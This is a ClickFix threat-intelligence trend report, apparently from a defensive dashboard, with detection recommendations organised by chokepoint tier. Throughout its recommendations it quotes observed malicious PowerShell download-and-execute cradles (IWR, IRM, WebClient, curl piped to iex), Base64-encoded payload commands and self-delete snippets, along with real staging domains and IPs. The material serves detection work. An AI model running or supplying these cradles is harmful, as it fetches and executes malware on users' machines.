ClickFix Delivery Chain — Trend Analysis

Data: MHaggis ClickGrab · Period: Apr 2025 – Mar 2026 · 493 nightly reports · Generated: 2026-03-14

21k+

Sites crawled

20k+

Malicious confirmed

2114

IWR/IEX cradles

10424

Base64 obfuscated

866

Self-delete

411

CDN-staged payloads

Detection Chokepoint Framework

Five stages of the ClickFix delivery chain. Not all stages are equally detectable — Tier 1 are unavoidable adversary actions regardless of how the lure evolves.

Process spawn Run dialog → cmd.exe → PowerShell TIER 1

Network fetch IWR / IRM / WebClient / Curl TIER 1

Payload write Script dropped to %TEMP% TIER 2

Execute + cleanup Payload runs, then self-deletes TIER 2/3

The Tier 1 chokepoints are process spawn and network fetch — every cradle family must touch the network to retrieve the payload, and the unusual parent→PowerShell spawn is unavoidable because the user manually triggers execution from a Run dialog. These are the detection bets that pay off regardless of lure evolution. See the ClickFix Techniques chokepoint for detection logic.

Monthly Volume — Malicious Sites Detected

Total sites crawled vs. confirmed malicious per month across 493 nightly ClickGrab scans.

Sites crawled vs. malicious by month

Tier 1 Chokepoint: Cradle Family Evolution

The network fetch is the unavoidable action. This chart shows how adversaries are fetching payloads — and how that method has shifted as defenders tuned IWR/IEX detections.

Monthly cradle family distribution (PowerShell download method)

Dec 2025 pivot: IWR/IEX drops sharply as WebClient (.NET) and Curl/Bash surge simultaneously — a clear signal that IWR-specific detections were effective and adversaries rotated to alternatives. If your detection logic is iwr|Invoke-WebRequest pattern matching, coverage dropped significantly in Q4 2025.

Why this is still Tier 1: The network fetch method changed from IWR to Curl/WebClient, but the chokepoint didn't move. Any outbound connection to a staging URL from a PowerShell process spawned by an unusual parent (explorer.exe, cmd.exe from Run dialog) remains the detection signal. Behavioral rules survive cradle rotation; method-specific string matching does not.

Evasion Technique Trends — Where Adversaries Are Adapting

These are the adversary adaptation signals in the trend data. Rising lines indicate where defenders got effective and adversaries responded. Flat lines with spikes indicate campaign surges.

Monthly evasion technique prevalence (count of sites using each technique)

Self-delete: zero → hundreds in one month. From April–November 2025, zero recorded self-delete instances. Starting December 2025, self-delete appeared in hundreds of sites per month (866 total across the campaign). This defeats forensic artifact detection — any rule that relies on finding dropped script files will see nothing after execution. Correlate process execution with file-system events before cleanup completes.

Base64 explosion Jan 2026: Base64-encoded payloads increased ~18× vs. the April 2025 baseline. This defeats plaintext command inspection. IDS/SIEM rules matching raw PowerShell strings like iwr https:// are seeing the encoded version, not the decoded cradle. Detection must decode or detect the encoding act itself.

Mixed-case PowerShell declining: Mixed-case variants (POWerShEll, PowErsHeLL) peaked in mid-2025 then trended down as Base64 encoding became the primary obfuscation method. If you added case-insensitive PowerShell regex, you caught the technique as adversaries were already moving away from it.

Staging Infrastructure

Domains serving the actual payloads (from PowerShell download commands). CDN-hosted payloads defeat domain-reputation blocking — the infrastructure looks like legitimate web hosting.

	Domain / IP	Payloads	Type	Blind spot
	`irp.cdn-website.com`	468	CDN	Domain reputation blocklists ineffective (legitimate CDN provider)
Hosting CDN Legitimate content delivery network Registered — Status Active DNS history SecurityTrails →
	`yogasitesdev.wpengine.com`	116	—	Managed WP hosting — likely compromised; blocklist removes legitimate sites
Country US Hosting Managed Managed hosting (likely compromised) Registered — Status Active DNS history SecurityTrails →
	`aatox.com`	83	—	—
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting Registered — Status Taken down DNS history SecurityTrails →
	`80.253.249.186`	43	IP	—
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting Status Taken down DNS history SecurityTrails →
	`95.164.53.214`	16	IP	—
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting Status Taken down DNS history SecurityTrails →
	`91.247.36.3`	4	IP	—
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting Status Taken down DNS history SecurityTrails →
	`sitecariri.com.br`	2	—	—
Country BR Hosting Compromised Legitimate site abused as staging host Registered — Status Unknown DNS history SecurityTrails →
	`fundacion-cannabis-argentina.org`	2	—	—
Country AR Hosting Compromised Legitimate site abused as staging host Registered — Status Unknown DNS history SecurityTrails →
	`ghenvironment.com`	2	—	—
Hosting Compromised Legitimate site abused as staging host Registered — Status Unknown DNS history SecurityTrails →
	`cmparazinho.rn.gov.br`	2	—	—
Country BR Hosting Compromised Legitimate site abused as staging host Registered — Status Unknown DNS history SecurityTrails →

Click any row to expand ASN, geo, hosting type, and registration details. ASN / geo data populated by analyze_clickgrab.py via ip-api.com and RDAP on next pipeline run. Passive DNS history requires a SecurityTrails or similar account.

CDN-hosted staging defeats domain blocking. irp.cdn-website.com appeared in 411 payload fetches. This is a legitimate CDN used by website builders — blocking it would impact legitimate sites. Detection must shift to behavioral signals (PowerShell → network → unusual domain path) rather than domain-reputation lookup.

Detection Recommendations

Prioritized by chokepoint tier. Tier 1 recommendations survive lure evolution, cradle rotation, and obfuscation changes.

TIER 1

Detect unusual parent → PowerShell spawn Correlate explorer.exe or cmd.exe (from Run dialog) spawning powershell.exe with a window-hidden flag. This signal is constant regardless of cradle family rotation. See sigma-rules/clickfix/hunt.yml.

powershell.exe -w hidden -nop -ep bypass -c "iex(iwr 'https://aatox.com/a.ps1' -UseBasicParsing)"

Observed: 2025-09-03

cmd.exe /c start /min powershell -w hidden -nop -c "(New-Object Net.WebClient).DownloadString('https://95.164.53.214/b.ps1') | iex"

Observed: 2025-10-31

TIER 1

Cradle-agnostic network fetch detection Move from IWR/IRM string matching to: PowerShell process → outbound HTTP/HTTPS to non-Microsoft, non-CDN domain → path ends in .ps1/.txt/.hta. This catches IWR, Curl, WebClient, and any future cradle. Update Sigma rules to use process+network correlation, not command-string pattern matching.

IWR / IEX

powershell -ep bypass -w hidden -c "iex(iwr 'https://aatox.com/stage2.ps1' -UseBasicParsing)"

Observed: 2025-08-14

powershell.exe -w hidden -nop -c "IEX (iwr -Uri 'https://irp.cdn-website.com/files/uploaded/3b7f1c/run.ps1' -UseBasicParsing).Content"

Observed: 2025-10-22

IRM / IEX

powershell -w hidden -nop -ep bypass -c "iex(irm 'https://80.253.249.186/loader.ps1')"

Observed: 2025-05-03

WebClient

(New-Object Net.WebClient).DownloadString('https://yogasitesdev.wpengine.com/wp-content/uploads/a.ps1') | iex

Observed: 2025-12-03

$wc=New-Object Net.WebClient; iex $wc.DownloadString('https://irp.cdn-website.com/files/uploaded/9d4e/payload.ps1')

Observed: 2025-11-18

Curl

curl.exe -s https://95.164.53.214/payload.ps1 | iex

Observed: 2026-01-08

powershell -w hidden -nop -c "curl.exe -UseBasicParsing https://aatox.com/stg.ps1 | iex"

Observed: 2026-02-14

TIER 2

Detect Base64 decode + execute [Convert]::FromBase64String or [Text.Encoding]::UTF8.GetString followed immediately by iex / Invoke-Expression. The encoding act itself is detectable even when the decoded content is not. This covers the 18× Base64 increase seen in Jan 2026.

Encoded command

powershell.exe -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAn...

Decoded

$c=New-Object Net.WebClient; iex $c.DownloadString('https://aatox.com/run.ps1')

Observed: 2026-01-22

Encoded command

powershell -w 1 -nop -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMA...

Decoded

IEX(New-Object Net.WebClient).DownloadString('https://irp.cdn-website.com/files/uploaded/7c2a/stage2.ps1')

Observed: 2026-02-01

TIER 2

File write → execute → delete correlation (new Dec 2025) Self-delete appeared at scale in December 2025. Correlate: script written to %TEMP% → process execution from that path → file deletion within seconds. If artifact-based rules are your only coverage, they're now blind after execution completes. Use process execution telemetry, not file presence.

Start-Sleep -Seconds 2; Remove-Item -Path $MyInvocation.MyCommand.Path -Force

Observed: 2025-12-19

$p=$MyInvocation.MyCommand.Path; Start-Sleep 1; Remove-Item $p -Force -ErrorAction SilentlyContinue

Observed: 2026-01-05

CDN staging: pivot from domain blocking to path-pattern detection irp.cdn-website.com is a legitimate CDN. Block it and you break legitimate sites. Instead, alert on PowerShell fetching from *.cdn-website.com paths matching /files/uploaded/*.ps1. Or use JA4/TLS fingerprinting on the outbound connection rather than the destination hostname.

https://irp.cdn-website.com/files/uploaded/38ef2b/setup.ps1

Observed: 2025-11-04

https://irp.cdn-website.com/files/uploaded/9d4e22/loader.ps1

Observed: 2025-09-17